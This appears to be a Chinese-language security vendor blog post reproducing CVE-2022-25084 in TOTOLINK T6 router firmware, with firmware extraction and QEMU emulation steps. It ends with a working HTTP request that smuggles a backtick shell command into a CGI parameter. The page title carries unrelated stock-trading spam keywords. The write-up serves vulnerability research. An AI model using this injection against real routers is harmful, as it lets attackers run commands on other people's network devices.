在线炒股配资门户网-杠杆交易软件搜加杠网-【东方资本】,股票杠杆app,今日热股什么意思,预计下周一股市行情展望

提交需求
*
*

*
*
*
立即提交
點擊”立即提交”,表明我理解并同意 《美創科技隱私條款》

logo

    產品與服務
    解決方案
    技術支持
    合作發展
    關于美創
    申請試用
      CVE-2022-25084 TOTOLINK路由器任意命令執行漏洞復現
      發布時間:2023-06-02 閱讀次數: 1218 次


      漏洞簡介



      TOTOLINK是一款無線路由品牌,TOTOLINK T6_Firmware V5.9c.4085_B20190428存在一個任意命令執行漏洞。


      影響版本



      TOTOLINK T6_Firmware V5.9c.4085_B20190428

      訪問


      https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.h

      下載T6_Firmware V5.9c.4085_B20190428固件

      圖片

      固件下載成功后,執行

      binwalk -Me TOTOLINK_C818NR_T6_IP04338_8197FN_SPI_16M128M_V5.9c.4085_B20190428_ALL.web --run-as=root

      提取文件系統

      圖片

      進入提取的文件系統目錄

      執行

      mkdir var/run && touch /var/run/lighttpd.pid

      創建路由器啟動環境所需的pid

      圖片

      執行

      給路由器web服務創建一個虛擬網絡環境

      圖片

      執行

      wget https://people.debian.org/\~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2 && wget https://people.debian.org/\~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta

      下載鏡像和虛擬磁盤環境,為搭建路由器web作前置準備

      圖片

      鏡像和虛擬磁盤下載完畢后,執行

      qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic

      啟動虛擬環境,虛擬環境啟動后賬號密碼為root/root

      登錄虛擬環境后,執行


      ifconfig eth0 192.168.6.10

      配置虛擬環境網絡

      圖片

      返回原始機器環境,執行


      scp -r squashfs-root/ root@192.168.6.10:/root/

      將文件系統拷貝至虛擬環境中

      在虛擬環境中執行

      啟動路由器web服務

      圖片

      在原始機器環境中通過瀏覽器訪問

      http://192.168.6.15/login.asp

      出現如圖所示頁面代表環境搭建成功

      圖片


      該漏洞觸發點位于

      /cgi-bin/downloadFlile.cgi

      構造如下數據包并請求

      執行pwd命令并將命令結果寫入../pwd.txt

      • GET /cgi-bin/downloadFlile.cgi?payload=`pwd>../pwd.txt` HTTP/1.1
        Host: 192.168.6.10
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
      • Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      • Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      • Accept-Encoding: gzip, deflate
      • Connection: close
      • Upgrade-Insecure-Requests: 1

      瀏覽器訪問

      如圖所示,頁面顯示pwd命令結果

      上一條:美創科技發布《2023年5月勒索病毒威脅報告》
      下一條:每周安全速遞2?2|微軟發現macOS漏洞可讓黑客繞過SIP root限制
      免費試用
      服務熱線

      馬上咨詢

      400-811-3777

      回到頂部